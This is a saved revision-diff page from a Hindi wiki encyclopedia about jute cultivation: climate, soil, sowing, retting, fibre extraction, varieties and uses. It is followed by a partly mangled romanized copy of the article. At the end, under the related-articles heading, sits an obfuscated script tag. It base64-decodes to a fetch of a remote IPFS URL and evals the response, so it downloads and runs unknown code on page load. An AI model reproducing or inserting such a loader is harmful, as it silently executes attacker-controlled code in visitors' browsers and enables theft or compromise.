Difference between revisions of "जूट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 17: Line 17:
 
बीज से अंकुर निकलने के दो तीन महीने के बाद पौधे को अधिक [[जल]] की आवश्यकता पड़ती है। अतः इसकी खेती 150 से 200 सेमी. या उससे भी अधिक [[वर्षा]] वाले भागों में की जाती है। 10 से 11 माह में इसकी फ़सल तैयार होती है, अतः खेतों में 6-7 माह तक पानी अधिक रहना चाहिए।
 
बीज से अंकुर निकलने के दो तीन महीने के बाद पौधे को अधिक [[जल]] की आवश्यकता पड़ती है। अतः इसकी खेती 150 से 200 सेमी. या उससे भी अधिक [[वर्षा]] वाले भागों में की जाती है। 10 से 11 माह में इसकी फ़सल तैयार होती है, अतः खेतों में 6-7 माह तक पानी अधिक रहना चाहिए।
 
====मिट्टी====
 
====मिट्टी====
जूट की खेती से भूमि बहुत अनुपजाऊ हो जाती है। इस कारण जूट की खेती उन्हीं स्थानों में की जाती है, जहाँ प्रतिवर्ष नदियाँ उपजाऊ [[मिट्टी]] लाकर बिछाती हैं। अतः पश्चिमी बंगाल में डेल्टाई क्षेत्र में अधिक जूट पैदा किया जाता है। कांप एवं दोमट मिट्टी से यह खूब पेदा किया जाता है, किन्तु उसमें एकरूपता नहीं रहती।
+
जूट की खेती से भूमि बहुत अनुपजाऊ हो जाती है। इस कारण जूट की खेती उन्हीं स्थानों में की जाती है, जहाँ प्रतिवर्ष नदियाँ उपजाऊ [[मिट्टी]] लाकर बिछाती हैं। अतः [[पश्चिम बंगाल]] में डेल्टाई क्षेत्र में अधिक जूट पैदा किया जाता है। कांप एवं दोमट मिट्टी से यह खूब पेदा किया जाता है, किन्तु उसमें एकरूपता नहीं रहती।
 
====श्रम====
 
====श्रम====
 
जूट के लिए सस्ते मजदूरों की आवश्यकता होती है, क्योंकि तैयार पौधों को काटने तथा बण्डल बनाने, पानी में सड़ाने एवं रेशे निकालने आदि के कार्यों के लिए अधिक मजदूर चाहिए होते हैं। इस कार्य के लिए पर्याप्त धन भी व्यय करना पड़ता है। इसीलिए यह ज़रूरी है कि इन समस्त कार्यों के लिए सस्ते मजदूरों को लाया जाए।
 
जूट के लिए सस्ते मजदूरों की आवश्यकता होती है, क्योंकि तैयार पौधों को काटने तथा बण्डल बनाने, पानी में सड़ाने एवं रेशे निकालने आदि के कार्यों के लिए अधिक मजदूर चाहिए होते हैं। इस कार्य के लिए पर्याप्त धन भी व्यय करना पड़ता है। इसीलिए यह ज़रूरी है कि इन समस्त कार्यों के लिए सस्ते मजदूरों को लाया जाए।
====कटाई====
+
==जूट का कृषि==
पौधे के तीन से लेकर नौ इंच तक बड़े होने पर पहले गोड़ाई की जाती है। बाद में दो या तीन निराई और की जाती है। [[जून]] से लेकर [[अक्टूबर]] तक फ़सलें काटी जाती हैं। फूल झर जाने तथा फली निकल आने पर ही फ़सल काटनी चाहिए। अन्यथा देर करने से पछेती कटाई से रेशे मज़बूत, पर भद्दे और मोटे हो जाते हैं और उनमें चमक नहीं होती। बहुत अगेती कटाई से पैदावार कम और रेशे कमज़ोर होते हैं।
+
पश्चिम बंगाल में जूट का उत्पादन अधिकतर नदियों के पुराने या नये कगारों पर उभरी हुई भूमि और बलुई किनारों पर किया जाता है। जूट के पौधों से रेशा प्राप्त करने के लिए इन्हें 20-25 दिन तक जल में भिगोकर सड़ाने के लिए रखना पड़ता है, अतः उत्तम और मीठे जल की भी आवश्यकता होती है। बाद में इसे पीटकर धोया जाता है और फिर बण्डल को सुखाकर उससे रेशे को अलग कर लिया जाता है। [[भारत]] में जूट का उत्पादन [[पश्चिम बंगाल]], [[बिहार]], [[उड़ीसा]], [[असम]] आदि राज्यों तक ही सीमित हैं, क्योंकि यहां [[गंगा]], [[महानदी]] और [[ब्रह्मपुत्र नदी]] द्वारा लायी हुई उपजाऊ मिट्टी मिलती है और बाढ़ के साथ बदलते रहने से इसकी उपजाऊ मिट्टी का ह्रास नहीं होता। अतः बिना खाद दिए इन राज्यों में जूट की खेती की जाती है। इसके पौधे की लम्बाई 3 से 3.5 मीटर तक होती है।
 
+
====बुवाई तथा कटाई====
भूमि की सतह से पौधे काट लिए जाते हैं। कहीं पौधे आमूल उखाड़ लिए जाते हैं। ऐसी कटी फ़सल को दो तीन दिन सूखी ज़मीन में छोड़ देते हैं, जिससे पत्तियाँ सूख या सड़ कर गिर पड़ती हैं। तब डंठलों को गरों में बाँधकर पत्तों, घासपातों, मिट्टी आदि से ढँककर छोड़ देते हैं। फिर गरों से कचरा हटाकर उनकी शाखादार चोटियों को काटकर निकाल लेते हैं। अब पौधे गलाए जाते हैं। गलाने के काम दो दिन से लेकर एक मास तक का समय लग सकता है। यह बहुत कुछ वायुमण्डल के ताप और पानी की प्रकृति पर निर्भर करता है। गलने का काम कैसा चल रहा है, इसकी प्रारंभ में प्रति दिन जाँच करते रहते हैं। जब देखते है कि डंठल से रेशे बड़ी सरलता से निकाले जा सकते हैं तब डंठल को पानी से निकाल कर रेशे अलग करते और धोकर सुखाते हैं।
+
इसकी खेती उस उभरी हुई भूमि पर होती है, जो नदियों के पुराने या नये कगारों के कारण बन जाती है। गर्तों में धान और जूट को बारी-बारी से बोते हैं। पश्चिम बंगाल में भूमि के ऊंचे-नीचे होने पर ही जूट बोने का समय निर्भर रहता है। निम्न भूमियों पर [[फ़रवरी]] से [[मार्च]] तक तथा उच्च भूमि पर मार्च से [[जून]] तक जूट की बुवाई की जाती है। जो फ़सल सबसे पहले बोई जाती है, उसी को पहले काटा जाता है। वैसे सभी प्रकार की फ़सल के लिए कटाई [[अगस्त]] से [[सितम्बर]] तक की जाती है। फूल झर जाने तथा फली निकल आने पर ही फ़सल काटनी चाहिए, अन्यथा देर करने से पछेती कटाई से रेशे मज़बूत, पर भद्दे और मोटे हो जाते हैं और उनमें चमक नहीं होती। बहुत अगेती कटाई से पैदावार कम और रेशे कमज़ोर होते हैं।
[[चित्र:Jute-1.jpg|thumb|250px|जूट को धोते किसान]]
+
==जूट निकालना==
रेशा निकालने वाला पानी में खड़ा रहकर, डंठल का एक मूठा लेकर जड़ के निकट वाले छोर को छानी या मुँगरी से मार मार कर समस्त डंठल छील लेता है। रेशा या डंठल टूटना नहीं चाहिए। अब वह उसे सिर के चारों ओर घुमाकर पानी की सतह पर पट रखकर, रेशे को अपनी ओर खींचकर, अपद्रव्यों को धोकर और काले धब्बों को चुन कर निकाल देता है। अब उसका पानी निचोड़ कर धूप में सूखने के लिये उसे हवा में टाँग देता है। रेशों की पूलियाँ बाँधकर जूट प्रेस में भेजी जाती हैं, जहाँ उन्हें अलग-अलग विलगाकर द्रवचालित दाब में दबाकर गाँठ बनाते हैं। डंठलों में 4.5 से 7.5 प्रतिशत रेशा रहता है।
+
कटाई के समय भूमि की सतह से पौधे काट लिए जाते हैं। कहीं-कहीं पौधे आमूल उखाड़ लिए जाते हैं। ऐसी कटी फ़सल को दो तीन दिन सूखी ज़मीन में छोड़ देते हैं, जिससे पत्तियाँ सूखकर या सड़कर गिर पड़ती हैं। तब डंठलों को गरों में बाँधकर पत्तों, घास-पातों, [[मिट्टी]] आदि से ढँककर छोड़ देते हैं। फिर गरों से कचरा हटाकर उनकी शाखादार चोटियों को काटकर निकाल लेते हैं। अब पौधे गलाए जाते हैं। गलाने के काम में दो दिन से लेकर एक मास तक का समय लग सकता है। यह बहुत कुछ वायुमण्डल के [[ताप]] और पानी की प्रकृति पर निर्भर करता है। गलने का काम कैसा चल रहा है, इसकी प्रारंभ में प्रतिदिन जाँच करते रहते हैं। जब देखते है कि डंठल से रेशे बड़ी सरलता से निकाले जा सकते हैं, तब डंठल को पानी से निकालकर रेशे अलग करते और धोकर सुखाते हैं। [[चित्र:Jute-1.jpg|thumb|250px|जूट को धोते किसान]] रेशा निकालने वाला पानी में खड़ा रहकर, डंठल का एक मूठा लेकर जड़ के निकट वाले छोर को छानी या मुँगरी से मार-मारकर समस्त डंठल छील लेता है। रेशा या डंठल टूटना नहीं चाहिए। अब वह उसे सिर के चारों ओर घुमाकर पानी की सतह पर पट रखकर, रेशे को अपनी ओर खींचकर, अपद्रव्यों को धोकर और काले धब्बों को चुनकर निकाल देता है। अब उसका पानी निचोड़ कर धूप में सूखने के लिये उसे हवा में टाँग देता है। रेशों की पूलियाँ बाँधकर जूट प्रेस में भेजी जाती हैं, जहाँ उन्हें अलग-अलग विलगाकर द्रवचालित दाब में दबाकर गाँठ बनाते हैं। डंठलों में 4.5 से 7.5 प्रतिशत रेशा रहता है।
 
+
====प्रकार====
 +
भारत में दो प्रकार की जूट पैदा की जाती है। 'चीनी जूट' नदियों के उभरे हुए किनारों या नदी के द्वीपों में बोया जाता है। 'देशी जूट' मुख्य रूप से चीनी भूमियों में बोया जाता है। भारत के अनेक भागों में ये दो प्रकार के जूट साथ-साथ उगते हैं। प्रथम प्रकार का जूट सफेदी लिए और चमकीला तथा अच्छा होता है। जूट का रेशा दो प्रकार के पौधों से प्राप्त किया जाता है। ये पौधे 'श्वेत जूट' और 'टोसा जूट' हैं।
 
==आकार==
 
==आकार==
 
ये साधारणतया छह से लेकर दस फुट तक लंबे होते हैं, पर विशेष अवस्थाओं में 14 से लेकर 15 फुट तक लंबे पाए गए हैं। तुरंत का निकाला रेशा अधिक मज़बूत, अधिक चमकदार, अधिक कोमल और अधिक [[सफ़ेद रंग|सफ़ेद]] होता है। इन गुणों को खुला रखने से इनका ह्रास होता है। जूट के रेशे का विरंजन कुछ सीमा तक हो सकता है, पर विरंजन से बिल्कुल सफ़ेद रेशा नहीं प्राप्त होता। रेशा आर्द्रताग्राही होता है। 6 से लेकर 23 प्रतिशत तक नमी रेशे में रह सकती है।
 
ये साधारणतया छह से लेकर दस फुट तक लंबे होते हैं, पर विशेष अवस्थाओं में 14 से लेकर 15 फुट तक लंबे पाए गए हैं। तुरंत का निकाला रेशा अधिक मज़बूत, अधिक चमकदार, अधिक कोमल और अधिक [[सफ़ेद रंग|सफ़ेद]] होता है। इन गुणों को खुला रखने से इनका ह्रास होता है। जूट के रेशे का विरंजन कुछ सीमा तक हो सकता है, पर विरंजन से बिल्कुल सफ़ेद रेशा नहीं प्राप्त होता। रेशा आर्द्रताग्राही होता है। 6 से लेकर 23 प्रतिशत तक नमी रेशे में रह सकती है।

Revision as of 12:47, 11 March 2012

thumb|250px|sookhati huee joot joot athava patasan aj manav jivan ke lie bahut hi mahattvapoorn ho gaya hai. joot shabd sanskrit ke 'jata' ya 'joot' se nikala samajha jata hai. yoorop mean 18vian shatabdi mean sabase pahale is shabd ka prayog milata hai, yadyapi vahaan is dravy ka ayat 18vian shatabdi ke poorv se 'pat' ke nam se hota a raha tha. vishv mean joot utpadan karane vale deshoan mean avibhajit bharat ka prayah ekadhikar tha, kintu vibhajan ke phalasvaroop is paristhiti me antar p d gaya. joot paida karane vale pavana, bogara, maimanasianh, rangapur, malada, dhaka aur faridapur zile baangladesh[1] mean chale ge. ab vishv ke utpadan ka 40 pratishat bharat aur 50 pratishat baangladesh se prapt hota hai.

joot ke reshe

joot ke reshe do prakar ke joot ke paudhoan se prapt hote haian. ye paudhe 'tiliesiee kul' ke 'kaurakoras kaipsulairis' aur 'kaurakoras olitoriyas' haian aur reshe ke liye donoan hi ugae jate haian. pahale prakar ki fasal kul varshik kheti ke 3/4 bhag mean aur doosare prakar ki fasal kul kheti ke shesh 1/4 bhag mean hoti hai. inake bij se fasal ugaee jati hai. bij ke liye paudhoan ko poora pakane diya jata hai, par reshe ke liye pakane ke pahale hi kat liya jata hai. yah paudhe mukhyat: bharat aur pakistan mean upajae jate haian.

kaurakoras kaipsulairis

kaipsulairis kathor hota hai aur isaki kheti ooanchi tatha nichi donoan prakar ki bhoomiyoan mean hoti hai. kaipsulairis ki pattiyaan gol, bij aandakar gahare bhoore rang ke aur reshe safed par kuchh kamazor hote haian. kaipsulairis ki kismean phandook, ghaleshvari, phooleshvari, desihat, banbee di 154 aur ar 85 haian.

kaurakoras olitoriyas

olitoriyas ki kheti keval ooanchi bhoomi mean hoti hai. olitoriyas ki pattiyaan vartul, soochyakar aur bij kale rang ke hote haian aur reshe suandar sudridh par kuchh phike rang ke hote haian. olitoriyas ki kismean desi, tosah, arathoo aur chinasura grin haian.

utpadak desh

bharat mean sarvapratham prarambh hone vala udyog joot ka hi tha. desh ke bangal, bihar, u disa, asam aur uttar pradesh ke kuchh taraee vale bhagoan mean lagabhag 16 lakh ek d bhoomi mean joot ki kheti hoti hai. isase lagabhag 38 lakh gaanth[2] joot paida hota hai. utpadan ka lagabhag 67 pratishat bharat mean hi khapata hai. 7 pratishat kisanoan ke pas rah jata hai aur shesh briten, jarmani, fraans, itali, aur sanyukt rajy amarika ko niryat hota hai. amarika, misr, brazil, afrika adi any deshoan mean isake upajane ki cheshtaean ki geean, lekin bharat ke joot ke sammukh ve abhi tak tik nahian sake. thumb|left|joot ke pe d

bhaugolik dashaean

joot ki kheti ke lie bahut hi savadhanipoorvak har krishi-karm kiya jata hai. isaki kheti ke lie nimnalikhit dashaoan ka hona avashyak hai-

jalavayu tatha tapaman

joot ki kheti garam aur nam jalavayu mean hoti hai. isaki kheti ke lie tapaman 25° se 35° seantigred aur apekshik ardrata 90 pratishat honi chahie. halki baluee, delta ki domat mitti mean kheti achchhi hoti hai. is drishti se bangal ki jalavayu isake liye sabase adhik upayukt hai. khet ki jutaee achchhi honi chahie. bhoomi mean prati ek d 50 se 100 man gobar ki khad ya kanpost aur 400 pauand lak di ya ghas-pat ki rakh dali jati hai. purani mitti mean 30-60 pauand naitrojan diya ja sakata hai. kuchh naitrojan bone ke pahale aur shesh bijaankuran ke ek saptah bad dena chahie. potash aur choone se bhi labh hota hai. nichi bhoomi mean faravari mean aur ooanchi bhoomi mean march se julaee tak boaee hoti hai. sadharanataya chhitak boaee hoti hai. ab dril ka bhi upayog hone laga hai. prati ek d 6 se lekar 10 pauand tak bij lagata hai.

varsha

bij se aankur nikalane ke do tin mahine ke bad paudhe ko adhik jal ki avashyakata p dati hai. atah isaki kheti 150 se 200 semi. ya usase bhi adhik varsha vale bhagoan mean ki jati hai. 10 se 11 mah mean isaki fasal taiyar hoti hai, atah khetoan mean 6-7 mah tak pani adhik rahana chahie.

mitti

joot ki kheti se bhoomi bahut anupajaoo ho jati hai. is karan joot ki kheti unhian sthanoan mean ki jati hai, jahaan prativarsh nadiyaan upajaoo mitti lakar bichhati haian. atah pashchim bangal mean deltaee kshetr mean adhik joot paida kiya jata hai. kaanp evan domat mitti se yah khoob peda kiya jata hai, kintu usamean ekaroopata nahian rahati.

shram

joot ke lie saste majadooroan ki avashyakata hoti hai, kyoanki taiyar paudhoan ko katane tatha bandal banane, pani mean s dane evan reshe nikalane adi ke karyoan ke lie adhik majadoor chahie hote haian. is kary ke lie paryapt dhan bhi vyay karana p data hai. isilie yah zaroori hai ki in samast karyoan ke lie saste majadooroan ko laya jae.

joot ka krishi

pashchim bangal mean joot ka utpadan adhikatar nadiyoan ke purane ya naye kagaroan par ubhari huee bhoomi aur baluee kinaroan par kiya jata hai. joot ke paudhoan se resha prapt karane ke lie inhean 20-25 din tak jal mean bhigokar s dane ke lie rakhana p data hai, atah uttam aur mithe jal ki bhi avashyakata hoti hai. bad mean ise pitakar dhoya jata hai aur phir bandal ko sukhakar usase reshe ko alag kar liya jata hai. bharat mean joot ka utpadan pashchim bangal, bihar, u disa, asam adi rajyoan tak hi simit haian, kyoanki yahaan ganga, mahanadi aur brahmaputr nadi dvara layi huee upajaoo mitti milati hai aur badh ke sath badalate rahane se isaki upajaoo mitti ka hras nahian hota. atah bina khad die in rajyoan mean joot ki kheti ki jati hai. isake paudhe ki lambaee 3 se 3.5 mitar tak hoti hai.

buvaee tatha kataee

isaki kheti us ubhari huee bhoomi par hoti hai, jo nadiyoan ke purane ya naye kagaroan ke karan ban jati hai. gartoan mean dhan aur joot ko bari-bari se bote haian. pashchim bangal mean bhoomi ke ooanche-niche hone par hi joot bone ka samay nirbhar rahata hai. nimn bhoomiyoan par faravari se march tak tatha uchch bhoomi par march se joon tak joot ki buvaee ki jati hai. jo fasal sabase pahale boee jati hai, usi ko pahale kata jata hai. vaise sabhi prakar ki fasal ke lie kataee agast se sitambar tak ki jati hai. phool jhar jane tatha phali nikal ane par hi fasal katani chahie, anyatha der karane se pachheti kataee se reshe mazaboot, par bhadde aur mote ho jate haian aur unamean chamak nahian hoti. bahut ageti kataee se paidavar kam aur reshe kamazor hote haian.

joot nikalana

kataee ke samay bhoomi ki satah se paudhe kat lie jate haian. kahian-kahian paudhe amool ukha d lie jate haian. aisi kati fasal ko do tin din sookhi zamin mean chho d dete haian, jisase pattiyaan sookhakar ya s dakar gir p dati haian. tab danthaloan ko garoan mean baandhakar pattoan, ghas-patoan, mitti adi se dhankakar chho d dete haian. phir garoan se kachara hatakar unaki shakhadar chotiyoan ko katakar nikal lete haian. ab paudhe galae jate haian. galane ke kam mean do din se lekar ek mas tak ka samay lag sakata hai. yah bahut kuchh vayumandal ke tap aur pani ki prakriti par nirbhar karata hai. galane ka kam kaisa chal raha hai, isaki praranbh mean pratidin jaanch karate rahate haian. jab dekhate hai ki danthal se reshe b di saralata se nikale ja sakate haian, tab danthal ko pani se nikalakar reshe alag karate aur dhokar sukhate haian. thumb|250px|joot ko dhote kisan resha nikalane vala pani mean kh da rahakar, danthal ka ek mootha lekar j d ke nikat vale chhor ko chhani ya muangari se mar-marakar samast danthal chhil leta hai. resha ya danthal tootana nahian chahie. ab vah use sir ke charoan or ghumakar pani ki satah par pat rakhakar, reshe ko apani or khianchakar, apadravyoan ko dhokar aur kale dhabboan ko chunakar nikal deta hai. ab usaka pani nicho d kar dhoop mean sookhane ke liye use hava mean taang deta hai. reshoan ki pooliyaan baandhakar joot pres mean bheji jati haian, jahaan unhean alag-alag vilagakar dravachalit dab mean dabakar gaanth banate haian. danthaloan mean 4.5 se 7.5 pratishat resha rahata hai.

prakar

bharat mean do prakar ki joot paida ki jati hai. 'chini joot' nadiyoan ke ubhare hue kinaroan ya nadi ke dvipoan mean boya jata hai. 'deshi joot' mukhy roop se chini bhoomiyoan mean boya jata hai. bharat ke anek bhagoan mean ye do prakar ke joot sath-sath ugate haian. pratham prakar ka joot saphedi lie aur chamakila tatha achchha hota hai. joot ka resha do prakar ke paudhoan se prapt kiya jata hai. ye paudhe 'shvet joot' aur 'tosa joot' haian.

akar

ye sadharanataya chhah se lekar das phut tak lanbe hote haian, par vishesh avasthaoan mean 14 se lekar 15 phut tak lanbe pae ge haian. turant ka nikala resha adhik mazaboot, adhik chamakadar, adhik komal aur adhik safed hota hai. in gunoan ko khula rakhane se inaka hras hota hai. joot ke reshe ka viranjan kuchh sima tak ho sakata hai, par viranjan se bilkul safed resha nahian prapt hota. resha ardratagrahi hota hai. 6 se lekar 23 pratishat tak nami reshe mean rah sakati hai.

joot ki paidavar, fasal ki kism, bhoomi ki urvarata, aantaralan, katane ka samay adi, anek batoan par nirbhar karate haian. kaipsulairis ki paidavar prati ek d 10-15 man aur olitoriyas ki 15-20 man prati ek d hoti hai. achchhi jotaee se prati ek d 30 man tak paidavar ho sakati hai.

joot ka upayog

joot ke reshe se bore, hesiyan tatha paiankiang ke kap de banate haian. kalin, dariyaan, parade, gharoan ki sajavat ke saman, astar aur rassiyaan bhi banati haian. danthal jalane ke kam ata hai aur usase barood ke koyale bhi banae ja sakate haian. danthal ka koyala barood ke liye achchha hota hai. danthal se lugadi bhi prapt hoti hai, jo kagaz banane ke kam a sakati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. tatkalin poorvi pakistan
  2. ek gaanth ka bhabritenar 400 pauand

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>